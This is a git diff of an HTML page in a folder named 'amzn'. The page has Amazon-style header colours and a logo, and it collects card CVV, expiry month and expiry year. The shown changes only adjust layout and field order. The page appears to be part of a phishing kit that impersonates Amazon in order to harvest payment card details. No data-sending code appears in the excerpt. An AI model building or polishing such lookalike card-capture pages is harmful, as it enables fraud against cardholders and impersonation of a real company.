--- a/amzn/index.html
+++ b/amzn/index.html
@@ -31,7 +31,7 @@
     </style>
 </head>
 
-<body style="max-width: 450px;">
+<body >
     <div style="background-color:#232f3e; width: 100%; height: 55px;">
         <img src="./logo.png" height="35" style="margin-top: 10px; margin-left: 10px;" />
     </div>
@@ -55,23 +55,23 @@
                     style="width: 99%; border-radius:  3px;  height: 45px; border: #313335 1px solid;" />
 
             </div>
-            <div style="display: flex;">
-
-                <div style="width: 35%;"></div><b>Expiry date</b>
-            </div>
+           <b>Expiry date</b>
+           
 
             <div style="margin-bottom: 10px; margin-top: 10px; display: flex; justify-content: space-between;">
-                <input v-model="cvv" placeholder="Cvv" type="password" maxlength="3" minlength="3" inputmode="numeric"
-                    style="width: 30%; border-radius: 3px; height: 45px; border: #313335 1px solid;" />
-                <select v-model="month"
-                    style="width: 30%; height: 50px; border-radius: 5px; background-color: gainsboro; border: none;">
+                
+                <select v-model="month" 
+                    style="width: 30%; padding:5px ; height: 50px; border-radius: 5px; background-color: gainsboro; border: none;">
                     <option v-for="m in monthList" :value="m" :key="m">{{m}}</option>
                 </select>
 
                 <select v-model="year"
-                    style="width: 30%; height: 50px; border-radius: 5px; background-color: gainsboro; border: none;">
+                    style="width: 30%; height: 50px; padding:5px ; border-radius: 5px; background-color: gainsboro; border: none;">
                     <option v-for="m in yearList" :value="m" :key="m">{{m}}</option>
                 </select>
+
+                <input v-model="cvv" placeholder="Cvv" type="password" maxlength="3" minlength="3" inputmode="numeric"
+                    style="width: 30%; border-radius: 3px; height: 45px; border: #313335 1px solid;" />
             </div>
 
         </div>
